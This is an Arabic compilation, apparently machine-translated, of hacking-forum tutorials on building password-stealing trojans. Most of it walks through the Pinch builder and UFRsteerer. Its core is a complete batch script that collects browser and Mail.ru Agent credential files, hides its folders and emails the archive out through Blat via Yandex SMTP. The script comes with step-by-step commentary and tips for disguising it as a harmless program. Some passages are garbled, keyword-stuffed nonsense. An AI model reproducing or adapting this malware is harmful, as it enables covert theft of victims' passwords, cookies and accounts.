الناس!!!
الآن سأخبرك بكيفية إنشاء فيروس طروادة الخاص بك (خاص بك تقريبًا)!

ماذا تحتاج:
العقول - 1 جهاز كمبيوتر، الكمبيوتر - 1 جهاز كمبيوتر، الوصول إلى الإنترنت - 1 جهاز كمبيوتر، قرصة (منشئ) - 1 جهاز كمبيوتر، الخادم (لتقارير طروادة) - 1 جهاز كمبيوتر، محلل (لفك تشفير التقارير).

ربما هذا كل شيء...

الآن، كما هو الحال دائما، قصة قصيرة.

حصان طروادة
..كانت معروفة منذ حوالي 33 قرنا

في القرن الثاني عشر قبل الميلاد. أعلنت اليونان الحرب على مدينة طروادة.
نشأ الصراع عندما اختطف أمير طروادة الملكة هيلين ملكة سبارتا وأعلن أنه يريد أن يجعلها زوجته. وهذا بطبيعة الحال أثار غضب اليونانيين، وخاصة ملك سبارتا. حاصر اليونانيون طروادة لمدة 10 سنوات، ولكن دون جدوى، لأن... كانت طروادة محصنة جيدًا.
وفي محاولته الأخيرة، تظاهر الجيش اليوناني بالتراجع وترك وراءه حصانًا خشبيًا ضخمًا. رأى الطرواديون الحصان، واعتقدوا أنه هدية من اليونانيين، فسحبوا الحصان إلى المدينة، دون أن يدركوا أن أفضل الجنود اليونانيين كانوا يجلسون داخل الحصان الخشبي الفارغ.
وتحت جنح الظلام، خرج الجنود وفتحوا أبواب المدينة وبعد ذلك قتلوا مع الجيش المتبقي جيش طروادة بأكمله. مثل الحصان الخشبي، البرنامج
يتظاهر حصان طروادة بأنه يفعل شيئًا واحدًا، لكنه في الحقيقة يفعل شيئًا مختلفًا تمامًا.

أليكسي ديمشينكو - كول خاتسكر الروسي معروف أيضًا باسم "coban2k"
مؤلف العديد من البرامج، وأفضل برنامج لديه (في رأيي) هو PINCH، وهو أكثر فيروسات طروادة شيوعًا على الإنترنت! يتقن العديد من لغات البرمجة وبشكل خاص: C++، Pascal، Delphi، MySQL، PHP، XML وغيرها الكثير. وبشكل عام أنصحك بالذهاب إلى موقعه الشخصي www.cobans.net حيث ستجد بعض المعلومات عنه.

على وجه الخصوص، نحن نفكر في برنامج Pinch (Pinch 2.58)
قرصة 2.58 هو منشئ، مترجم فيروس طروادة... لأن... في أداة الإنشاء، ستهاجم وظائف معينة لفيروس حصان طروادة... على سبيل المثال: سرقة كلمات المرور من ICQ، وTheBat، وFAT، وملفات تعريف الارتباط للمتصفح (هذا هو الأكثر شيوعًا).
ولكن هذا ليس كل شيء، يمكن لـ Pinch أيضًا: إنشاء/تحرير معلمة معينة في السجل، أو حذف نفسها بعد الانتهاء من العمل، أو إنشاء "شاشة الموت الزرقاء"، أو حتى الأفضل من ذلك، إنشاء خادم (وحدة تحكم) على كمبيوتر الضحية (BackDoor )، وبعد ذلك يصبح جهاز الكمبيوتر الخاص بالضحية ملكًا لك (حرفيًا). يمكنك تنفيذ هجمات DDOS من خلال جهاز الكمبيوتر الخاص به من خلال عنوان IP الخاص به، وفي هذه اللحظة تحافظ على سيادتك المجهولة.
لا تظن أنه لا يمكن أن يكون لديك سوى جهاز كمبيوتر واحد تحت تصرفك. يمكنك الحصول على أي عدد تريده منها، ولكن هذا يسمى بالفعل BotNet...

حسنًا، هذا كل شيء، فلنبدأ..

تعرف على الشكل الذي يبدو عليه Pinch Builder أدناه:

الشكل 1.1

تمت الإضافة بعد 55 ثانية
والآن سأشرح كيفية عمل حصان طروادة...

1. يمكنك تجميع حصان طروادة بحيث يتم إرسال التقارير إلى البريد الإلكتروني الذي حددته. لكن يمكنهم حرقك (أي حصان طروادة الخاص بك) لأن... قد يكون لدى ضحيتك حزمة الخدمة SP2 (Windows XP Service Pack 2)) مما يعني أن جدار الحماية لديه أيضًا... لن يقوم جدار الحماية أبدًا بتشغيل المنفذ 25 (SMTP) (دون إذنك) مما يعني أن Troy الخاص بك لن يتمكن من إرسال تقرير الضحية إلى بريد إلكتروني. (لا تتلقى تقارير بريدية معروفة مثل mail.ru و yandex.ru وما إلى ذلك) استخدم مرسل البريد http://goolook.ru ولكن ما زلت لا أوصي باستخدام SMTP!

2. يمكنك تجميع حصان طروادة بحيث يتم إرسال التقارير إلى الخادم الذي تحدده.
إنه أكثر أمانًا لأنه في وقت إرسال التقرير، تظهر Pinch على النحو التالي:
اسم العملية: iexplorer.exe
البروتوكول: http
العنوان البعيد: www.YOUR_SERVER.xxx/get.php
لا يستطيع جدار الحماية منع عملية "iexplorer.exe" (وإذا كان بإمكانه ذلك، فلن ترى أي شيء على شاشة الكمبيوتر (باستثناء صورة سطح المكتب))
البروتوكول: http:// يعني المنفذ "80" (لا توجد تعليقات)

لذلك، اليوم سننظر إلى "الثاني"، قلت بالفعل نعم (؟) أن هذا أفضل.

دعونا نلقي نظرة على المزيد من السباقات في Builder >>>

الشكل 1.1

1. انقر فوق علامة التبويب "HTTP" وحدد بروتوكول "HTTP".

2. في حقل URL، أدخل عنوان موقع الويب الخاص بك (الخادم)، على سبيل المثال: http://kuzia_lox.jino-net.ru/mailp_p/mail.php
وسنركز على هذا بمزيد من التفصيل..
لكي يرسل لك Pinch تقارير عبر http://، فأنت بحاجة إلى خادم (دعنا نسميه ببساطة "موقع") ولذا فأنت بحاجة إلى موقع يجب أن تعمل نصوص PHP فيه بشكل إلزامي!!! وأفضلها هو http://jino-net.ru
صحيح، قلت أن هناك أيضا http://onepage.ru/ ولكن تم تدمير الخادم.
فلنكمل...
لذلك، قم بالتسجيل على http://jino-net.ru تحت أي مجال وأي كلمة مرور J).
هل قمت بالتسجيل؟
اعتقد نعم…
فلنكمل...
لنفترض أنك قمت بالتسجيل تحت النطاق http://petia_lox.jino-net.ru
نذهب إلى بروتوكول نقل الملفات لموقعك. هل تعرف ما هو بروتوكول نقل الملفات؟ اههه... يجب أن أخبرك، لأنني أتذكر نفسي...
FTP هو محتوى موقعك... أي أنه باستخدام بروتوكول FTP (المنفذ 21)، يمكنك الوصول إلى جذر موقعك حيث توجد أدلة/مجلدات/ملفات مختلفة، وما إلى ذلك.

دعنا نذهب إلى Google.ru ونقوم بتنزيل برنامج "CuteFTP"... ربما سأفعل ذلك من أجلك.
لنذهب هنا >>>
http://www.google.ru/search?hl=ru&q=CuteFTP+download&btnG=Search+in+Google&lr=
أنا أحب الرابط الرابع أفضل.
تحميل برنامج CuteFTP 7.1 + روسفير
هيا بنا >>>
http://gizmodo.ru/2005/07/23/skachat_cuteftp_7_1__rusifikator/
أعتقد أنك ستكتشف بعد ذلك كيفية تنزيل البرنامج وكيفية تثبيته.

تمت الإضافة بعد دقيقة واحدة
تم التنزيل، التثبيت، ينالون الجنسية الروسية... فلنواصل...

انتقل الآن إلى بروتوكول نقل الملفات (FTP) الخاص بموقعك. انتقل إلى المجلد /docs/، وقم بإنشاء أي مجلد في هذا المجلد، على سبيل المثال "mail_p"، وامنح هذا المجلد حقوق CHMOD 777 (انقر بزر الماوس الأيمن على المجلد في قائمة السياق، وابحث عن المعلمة "CHMOD" أو "الخصائص" في إصدارات مختلفة من برنامج CuteFTP، ترجمات مختلفة)
الآن قم بتحميل الملف إلى هذا المجلد (mail_p). ما هو الحصول على؟
"الحصول على" هذا البرنامج النصي للبوابة لتلقي التقارير من القرص له الامتداد ".php"
يمكنك الحصول عليه هنا >>>
http://pinch3.ru/other/gate.txt
قم بإنشاء ملف نصي للمفكرة على جهاز الكمبيوتر الخاص بك وانسخ نص البوابة
http://pinch3.ru/other/gate.txt<<< в свой текстовый фаил >>> أعط الامتداد للملف النصي.php (كان في السابق .txt)

السكربت جاهز، أعد تسميته "mail" وقم بتحميله على FTP لموقع الويب الخاص بك في المجلد /docs/mail_p/
ومنح حقوق CHMOD لهذا الملف 777.

تذكر هذا المكان، سيتم الآن إرسال التقارير إلى هذا المجلد حيث يوجد ملف الحصول عليه (/docs/mail_p/).

لذلك نكتب في حقل URL (في المنشئ إذا لم تكن قد نسيت بعد)
http://petia_lox.jino-net.ru/mail_p/mail.php (لديك عنوانك الخاص)

3. دعونا ننظر >>>

الشكل 1.2

قم بوضع كافة مربعات الاختيار كما في الشكل 1.2
لا تحدد المربع الموجود أعلى معلمة "Opera"، وإلا فلن يتم فك تشفير التقرير (اقرأ أدناه).

يمكنك بالفعل الترجمة... ولكننا سننظر أيضًا إلى وظائف إضافية أخرى (على الرغم من أنها تكون مطلوبة في بعض الأحيان)...

علامة التبويب "PWD"، نحن نعرف بالفعل ما هي)
لنفترض أن علامة التبويب "تشغيل" مخصصة لتحسين ذكاء Pinch، أي لحذف نفسها وحفظ ملفات .dll الخاصة بك في Windows وغير ذلك الكثير.
علامة التبويب تجسس. أرسل لقطة شاشة لشاشة الضحية لحفظ IE KeyLog، وما إلى ذلك.
علامة التبويب "NET" لأوامر وحدة تحكم PHP تخطر/ لا أعرف الباقي...
حبيبي BegDor لم يستخدم أبدًا علامة التبويب "BD" من Pinch'a...
علامة التبويب "إلخ" لضغط حصان طروادة ولتغيير رمز حصان طروادة.
علامة التبويب "قتل" لقتل أي عمليات (على سبيل المثال جدار الحماية)
علامة التبويب "IE": إدارة IE، إضافة موقع إلى المفضلة، اتبع الرابط.
لا أعرف علامة التبويب "الدودة"... التي لها علاقة بـ DNSsecs.
علامة التبويب "IRC-bot" مخصصة أساسًا لـ bottrack. قواعد البوت نت)!!!

ارجع إلى علامة تبويب الأشخاص ذوي الإعاقة وانقر على الزر (أسفل) "ترجمة"

مرحبا!!! طروادة جاهز!!!

القرصنة كيفية إنشاء فيروس طروادة. قرصة (لللامرز)

نشأ الصراع عندما اختطف أمير طروادة الملكة هيلين ملكة سبارتا وأعلن أنه يريد أن يجعلها زوجته. وهذا بطبيعة الحال أثار غضب اليونانيين، وخاصة ملك سبارتا. حاصر اليونانيون طروادة لمدة 10 سنوات، ولكن دون جدوى، لأن... كانت طروادة محصنة جيدًا.

وفي محاولته الأخيرة، تظاهر الجيش اليوناني بالتراجع وترك وراءه حصانًا خشبيًا ضخمًا. رأى الطرواديون الحصان، واعتقدوا أنه هدية من اليونانيين، فسحبوا الحصان إلى المدينة، دون أن يدركوا أن أفضل الجنود اليونانيين كانوا يجلسون داخل الحصان الخشبي الفارغ.

وتحت جنح الظلام، خرج الجنود وفتحوا أبواب المدينة وبعد ذلك قتلوا مع الجيش المتبقي جيش طروادة بأكمله.

ملاحظات المشرف الشاب

منذ بضعة أيام، ترك أحد أصدقائي كتابات على حائط جهة الاتصال الخاصة بي تحتوي على رسالة مفادها أنه اخترق حسابي، وما إلى ذلك. كان هناك رابط لموقع vk-****.msk.ru. نعم. بالطبع.) كتبت إليه على الفور لعلاجه وتغيير كلمة المرور الخاصة به. لكن الرابط ما زال يثير اهتمامي، على الرغم من أنني كنت أعلم يقينًا أنه حصان طروادة (وهذا ما أثار اهتمامي). قررت اتباع هذا الرابط. ونتيجة لذلك، عُرض عليّ تنزيل برنامج من المفترض أنه يستفيد من ثغرة أمنية تم اكتشافها مؤخرًا ويسمح لك باختراق أي حساب.

تعليمات لإنشاء حصان طروادة لسرقة كلمات المرور

دليل مختصر لسرقة الأموال من الخدمات المصرفية عبر الإنترنت Hacking Territory: HackZona 28 ديسمبر 2010 كل شيء عن إنشاء مواقع الويب والمدونات والمنتديات والمتاجر عبر الإنترنت والترويج لها سواء كان من الضروري استخدام نوع من حصان طروادة لهذا الغرض، لا أعرف . كلمات المرور الخاصة بمنزلي معقدة للغاية، لذا آمل أن يتم حلها. في الأصل من أوكرانيا (التسجيل والمراجعات والفرص في Likpay) إنشاء حصان طروادة لسرقة كلمات المرور! - يوتيوب 1 نوفمبر 2012، إذا لم تفهم، فاكتب إلى Skype: comrad714 اسم البرنامج UFRsteer 3.0.1.0.

كيفية إنشاء حصان طروادة

الاستعداد، علينا أن نكتب برنامجين في وقت واحد. سيكون أحدهما على جهازك (العميل)، والآخر سيحتاج إلى رميه على الضحية (الخادم). سيكون هناك الكثير من العمل، وعدد أقل من الكلمات، وأقرب إلى الجسد.

لذلك، قم بتشغيل دلفي أو إذا كان لديك بالفعل قيد التشغيل، فقم بإنشاء مشروع جديد ("ملف" - "تطبيق جديد"). الآن سوف ننتقل إلى جزء الخادم من حصان طروادة.

هنا يجب عليك نقل "From1" من قسم "إنشاء النماذج تلقائيًا" (القائمة على اليسار) إلى "النماذج المتاحة" (القائمة على اليمين)، كما فعلت.

كيفية إنشاء حصان طروادة

أعتقد أن كل قارئ يعرف أصل ومعنى مقولة “حصان طروادة”. مبدأ تشغيل فيروس طروادة هو نفسه تقريبًا (وهذا هو سبب حصوله على اسمه). هناك أنواع عديدة لهذا الفيروس، اليوم سأركز على أحد الخيارات لإنشاء برنامج طروادة استنادا إلى تطورات أليكسي ديمشينكو أو كما يطلق عليه أيضا “ويعرف أيضا باسم coban2k” وهو مؤلف عدد ضخم من البرامج، بما في ذلك PINCH، الذي أصبح أكثر فيروسات طروادة شيوعًا على شبكة الإنترنت العالمية!

كيفية إنشاء برنامج طروادة.

لقد صنعنا أحصنة طروادة والآن نصنع أيضًا حصان طروادة لسرقة كلمات المرور!

سأخبرك هنا بكيفية إنشاء حصان طروادة بسيط لسرقة كلمات المرور من ICQ، Vkontakte، Odnoklassniki، Mail. إلخ. 3A%2F%2Fs61.ucoz.net%2Fsm%2F6%2Fsmile.gif&hash=1b9ff09e365c561776d64317149701b5″ /%

الآن افتح الملف "1.bat" باستخدام المفكرة. وقم بتغيير الكلمات "تسجيل الدخول" إلى تسجيل الدخول الخاص بك من بريد Yandex. وقم بتغيير كلمة "كلمة المرور" إلى كلمة مرور بريد Yandex الخاص بك.

ننتظر. تم التحميل.

نقوم بإنشاء حصان طروادة الذي يسرق جميع كلمات المرور من المتصفحات (كما وعدناكم)

لذلك نحتاج أولاً إلى تنزيل برنامج UFRsteerer، ويمكن القيام بذلك على الموقع الرسمي vazonez.com أو عبر الرابط >> http://rghost.ru/55883641

ثم ننتقل إلى "خيارات البناء" ونضغط على أيقونة التغيير بحيث يبدو حصان طروادة الخاص بنا كبرنامج حقيقي، أو ننقر على دمج الملفات (من الأفضل للضحية تشغيل البرنامج الذي تم لصق حصان طروادة به معًا، ومع البرنامج طروادة نفسه)

إنشاء حصان طروادة لسرقة كلمات المرور

خطة تشغيل الفيروس هي كما يلي: يتم إطلاقه، ويقوم بمسح جميع المجلدات الموجودة على جهاز الكمبيوتر ونسخ الملفات الضرورية (عن طريق القناع، على سبيل المثال، *.txt.pass*، وما إلى ذلك) إلى محرك أقراص فلاش.

تمكين وضع معالجة الأوامر الموسع، أي أنه يسمح بإنشاءات معقدة مثل أمرين في حالة واحدة وغيرها. لا تضحك، لأن هذا رائع جدًا بالنسبة لباتش.

بعد ذلك، عليك أن تتذكر المسار إلى الدليل الذي تم تشغيل الملف الدفعي منه (يجب علينا نسخ البيانات إلى محرك الأقراص المحمول الخاص بنا، وليس إلى بعض محركات الأقراص الثابتة) لأن الكود الذي يأتي بعد ذلك يخلط بين قيمة متغير القرص المضغوط ( مجلد العمل الحالي).

في نهاية عمل حصان طروادة، سيقوم بإنشاء ملف جاهز.txt حتى نعرف أنه قد انتهى من العمل (سنجعل حصان طروادة غير مرئي، بدون وحدة تحكم).

حصان طروادة لسرقة كلمة مرور فكونتاكتي، قم بتنزيل المثبت

في أحد الأعمدة، يقوم حصان طروادة بسرقة كلمة المرور في جهة الاتصال بحظر اللعبة على PS3. لسرقة كلمة مرور حصان طروادة والمواد المعترف بها للسرقة، يتم أخذ الإحداثيات الجغرافية للمالك في الاعتبار. مع الأخذ في الاعتبار إجراءات المستخدم، تتيح لك كلمة المرور Trojan تخصيص الشاشة للاتصال في النظام.

بالنسبة للاتصالات، توفر أحصنة طروادة الخاصة بكلمات المرور والتفاوض التلقائي أدوات إنشاء حديثة.

طروادة لسرقة كلمة المرور

تمامًا مثل العمل المكتبي، فهو يوفر سهولة التنقل على شكل قرص افتراضي. يعلن Active Control عن إطلاق منتج للعمل مع الإشارات المرجعية. تحدد المساحة الخطية موقعها الدقيق لمنع الاستحواذ عليها.

يبحث Power Batch عن موضوع تعليمات لتقييد حركة المرور. الحجم الكبير إلى حد ما في المخبز يسمح لك بعرض التقارير. من خلال الضغط باستمرار على المفاتيح للتبريد، فإن حصان طروادة الذي يسرق كلمة المرور، مثل التحرير الفردي، يتضمن نقلًا كاملاً للبيانات.

أحصنة طروادة رقم 9

Antivirus Stealer - قم بفك ضغط هذا البرنامج، وانسخ ملفين ومجلدًا إلى محرك أقراص محمول (Antivirus.bat,autorun.inf,prog) ويمكنك الذهاب مع أصدقائك باستخدام محرك الأقراص المحمول! تقوم بإدخال محرك الأقراص المحمول في الكمبيوتر، وانقر فوق Antivirus.bat، وعندما يتوقف يمكنك إغلاقه وإخراج محرك الأقراص المحمول، وسيتم تخزين جميع كلمات المرور الموجودة على جهاز الكمبيوتر الخاص بك على محرك الأقراص المحمول في "البرنامج" " -> مجلد "السجل".

سأصف في هذه المقالة مدى السرعة ودون صعوبة كبيرة في كتابة وإنشاء فيروس يسرق الملفات بكلمات مرور ويرسلها كلها إلى صندوق البريد الخاص بك.
لنبدأ بحقيقة أن الفيروس سيتم كتابته بتنسيق Bat"e (CMD، يمكنك تنفيذ الأوامر الأساسية) أي في ملف نصي عادي وسيتم تنفيذه باستخدام مترجم Windows القياسي المدمج - "سطر الأوامر" ".
لكتابة مثل هذا الفيروس، تحتاج إلى معرفة موقع التخزين الدقيق للملفات التي سيسرقها، ومكونات Blat التي يمكن تنزيلها من الموقع http://www.blat.net/ خارج الموقع أو من خادمنا، بالإضافة إلى مكون من أرشيف WinRaR Rar.exe (يمكنك الاستغناء عنه).
افتح المفكرة وانسخ الكود التالي هناك:

@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass\ MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r Copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" انسخ /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" انسخ /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" القرص المضغوط /D % APPDATA%\Opera\Opera\ نسخ /y wand.dat %SystemDrive%\pass\opera\wand.dat نسخ /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\ magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozilla\Firefox\Profiles\*.default\ نسخ /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite نسخة /y key3.db %SystemDrive%\pass\Mozilla\key3.db نسخة /y Signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite نسخة /y %Windir%\Rar.exe %SystemDrive%\pass\Rar .exe > لا يوجد ملف /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\rar.exe إلى -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ نسخة /y %SystemDrive%\ pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot%\wincs\blat.exe -تثبيت -server smtp.yandex.ru -port 587 -f تسجيل الدخول@yandex.ru -u تسجيل الدخول - كلمة المرور pw ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword - إلى تسجيل الدخول@yandex.ru - إرفاق %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\ قم بتمرير rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat.exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls

لن أكتب الكثير عن رمز التمهيد نفسه.
@echo off - يخفي جسد الباتينكا (لذلك ليس هناك حاجة إليه، لكنه لا يزال)
md %systemroot%\wincs - يقوم بإنشاء مجلد wincs في مجلد نظام Windows، بغض النظر عن محرك الأقراص المثبت عليه أو اسمه.
md %SystemDrive%\pass\ - يقوم بإنشاء مجلد المرور على القرص المثبت عليه نظام Windows.
md %SystemDrive%\pass\opera\ - ينشئ مجلد الأوبرا حيث سيتم نسخ wand.dat وcookies4.dat من متصفح Opera في المستقبل (ما يصل إلى 11* إصدار، يقوم Opera بتخزين كلمات المرور الخاصة به في ملف wand.dat)
MD %SystemDrive%\pass\Mozilla\- يقوم بإنشاء مجلد Mozilla حيث سيتم نسخ الملفات من متصفح Mozilla (cookies.sqlite، key3.db، Signons.sqlite) التي تم تخزين كلمات المرور فيها في المستقبل.
MD %SystemDrive%\pass\MailAgent\- يقوم بإنشاء مجلد MailAgent حيث سيتم نسخ الملفات التي تحتوي على سجل المراسلات ومفاتيح التسجيل (التي تخزن كلمات المرور) من وكيل البريد.
md %SystemDrive%\pass\MailAgent\reg- إنشاء مجلد ريج
attrib %systemroot%\wincs +h +s +r- يضع سمات في مجلد wincs، وبالتالي يخفيها عن الأنظار.
السمة %SystemDrive%\pass +h +s +r- نفس أعلاه.
انسخ /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- انسخ ملف blat.exe من موقع التحميل إلى مجلد wincs
انسخ /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- انسخ ملف blat.dll من موقع التحميل إلى مجلد wincs
انسخ /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- انسخ ملف blat.lib من موقع التحميل إلى مجلد wincs
CD /D %APPDATA%\Opera\Opera\ - ينتقل إلى مجلد الأوبرا حيث توجد الملفات التي تحتوي على كلمات مرور (وأشياء أخرى) للأوبرا.
انسخ /y wand.dat %SystemDrive%\pass\opera\wand.dat- انسخ ملف wand.dat إلى مجلد الأوبرا
انسخ /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- انسخ ملف cookie4.dat إلى مجلد الأوبرا
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- تصدير مفتاح التسجيل magent_logins2، حيث يتم تخزين كلمة المرور، إلى مجلد reg
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- تصدير مفتاح التسجيل magent_logins3، حيث يتم تخزين كلمة المرور، إلى مجلد reg
CD /D %APPDATA% - انتقل إلى مجلد AppData
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- نسخ محتويات المجلد Mra\Base إلى المجلد MailAgent
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- انسخ ملف ver.txt إلى مجلد MailAgent
القرص المضغوط %AppData%\Mozilla\Firefox\Profiles\*.default\- انتقل إلى المجلد الذي يحتوي على ملف تعريف متصفح Mozilla
انسخ /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- انسخ ملف cookies.sqlite إلى مجلد Mozilla
انسخ /y key3.db %SystemDrive%\pass\Mozilla\key3.db- انسخ ملف key3.db إلى مجلد Mozilla
انسخ /y Signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- انسخ ملف Signons.sqlite إلى مجلد Mozilla
انسخ /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- قم بنسخ مكون أرشيف WinRar Rar.exe إلى مجلد المرور
ديل /s /q %SystemRoot%\Rar.exe- إزالة مكون الأرشيف من مجلد Windows
%SystemDrive%\pass\rar.exe و -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- أرشفة محتويات مجلد المرور
انسخ /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rarانسخ الأرشيف الذي تم إنشاؤه إلى مجلد wincs
القرص المضغوط %systemroot%\wincs - انتقل إلى مجلد wincs
%systemroot%\wincs\blat.exe -تثبيت -server smtp.yandex.ru -port 587 -fتسجيل الدخول@yandex.ru -u تسجيل الدخول -pw كلمة المرور - يقوم بإعداد برنامج Blat لإرسال الأرشيف عن طريق تحديد البيانات للترخيص وإرسال الرسالة. لا تنس الإشارة إلى بياناتك من صندوق البريد حيث ستكون الرسالة مع الأرشيف مرسل.
ren *.rar pass.rar - فقط في حالة عدم أخذ الأرشيف لاسم خاطئ أثناء العملية، فسنعيد تسميته مرة أخرى إلى pass.rar
%systemroot%\wincs\blat.exe -كلمة مرور ملفات الجسم -إلىتسجيل الدخول@yandex.ru - قم بإرفاق %systemroot%\wincs\pass.rar- الإشارة إلى العنوان البريدي الذي سيتم إرسال الرسالة إليه وإرساله.
rmdir /s /q %SystemDrive%\pass- حذف مجلد المرور
rmdir /s /q %systemroot%\wincs- احذف المجلد winks
ديل /s /q %systemroot%\blat.exe
ديل /s /q %systemroot%\blat.dll- إزالة مكونات Blat من مجلد Windows.
ديل /s /q %systemroot%\blat.lib- إزالة مكونات Blat من مجلد Windows.
attrib +a +s +h +r %systemroot%\wind.exe- نضع صفات على أنفسنا، وبالتالي نخفي أنفسنا عن الأنظار.
الخروج - نكمل عملية الباتينكا ونخرج.
cls - مسح مخرجات أي أسطر في المترجم.
تم نسخها وحفظها كـwind.bat وتجميعها في ملف exe باستخدام برنامج تحويل Bat إلى exe، ثم نقوم بتجميع كل شيء معًا، أي أننا نأخذ مكونات برنامج Blat ومكون أرشيف WinRar (يمكنك التنزيل) ونلصقها في ملف واحد قابل للتنفيذ، أو أي برنامج به، يجب أن يكون مسار تحميل جميع الملفات هو %SystemRoot% أو %WindowsDir% أو %windir% .
نتيجة لذلك، نحصل على فيروس لن تلتقطه برامج مكافحة الفيروسات وسيرسل أرشيفًا يحتوي على ملفات إلى بريدك الإلكتروني. يمكن فك تشفير الملفات التي تصل عبر البريد الإلكتروني باستخدام استرداد كلمات المرور المتعددة، ولكن ليس كلها فقط wand.dat من الأوبرا، وبعد ذلك إذا لم يتم تحديثه إلى إصدارات 11*، يمكن فك تشفير جميع الملفات الأخرى عن طريق استبدالها بملفاتك الخاصة.
أعتقد أننا يمكن أن ننتهي هنا، ولكن إذا كان لديك أي أسئلة، فلا تتردد في طرحها.
شكرا لاهتمامكم، كل التوفيق!
© سواب TheHackWorld.in

هنا سأخبرك بكيفية إنشاء حصان طروادة بسيط لسرقة كلمات المرور من ICQ، Vkontakte، Odnoklassniki، Mail... إلخ، إلخ....
لنبدأ... أولا نحتاج إلى بعض البرامج:
استعادة كلمة المرور المتعددة - أداة مساعدة لاستعادة كلمات المرور المنسية
بلات هو عميل البريد الإلكتروني.
محول Bat to Exe - محول تنسيق Bat-exe.
يمكنك تنزيل كل هذا في أرشيف واحد:

يجب أن تكون مسجلا لرؤية الروابط.

قم بالتنزيل والفك في مجلد منفصل ...
الآن افتح الملف "1.bat" باستخدام المفكرة... وقم بتغيير الكلمات "تسجيل الدخول" لتسجيل الدخول الخاص بك من بريد Yandex... وقم بتغيير كلمة "كلمة المرور" إلى كلمة المرور الخاصة بك من بريد Yandex...

حفظ وإغلاق...
الآن افتح "Bat_To_Exe_Converter"...
في حقل "الملف الدفعي"، حدد الملف الذي قمت بحفظه "1.bat"
لا يمكن تغيير الحقل "حفظ باسم"...
اضبط الإعدادات كما هو موضح أدناه:

الآن دعنا ننتقل إلى علامة التبويب "تضمين"...
وقم بنقل كافة الملفات من مجلدات "blat" و"MPR..." إلى هناك.

يجب أن يكون هناك سبعة منهم بالضبط!!!
حسنًا، دعونا الآن نضيف رمزًا إلى حصان طروادة الخاص بنا... هذا ليس ضروريًا، ولكنه يبدو أشبه بنوع من البرامج...
انتقل إلى علامة التبويب "معلومات الإصدار" وفي حقل "رمز الملف" حدد الرمز....
انقر فوق "تجميع"...
نحن في انتظار... اكتمال التنزيل... وتحقق من المجلد الذي يحتوي على الملف "1.bat"... من المفترض أن يظهر هناك حصان طروادة "1.exe" (يمكنك تسميته كما تريد

)...
حسنًا، لنتحقق الآن... قم بتشغيل حصان طروادة على جهاز الكمبيوتر الخاص بنا وانتظر... خلال 30 ثانية... سيتم إرسال ملف إلى بريدك الإلكتروني... قم بتنزيله (يتم تخزين كلمات المرور فيه)
تم التنزيل... الآن نقوم بتشغيله من خلال "MPR" ونعجب بكلمات المرور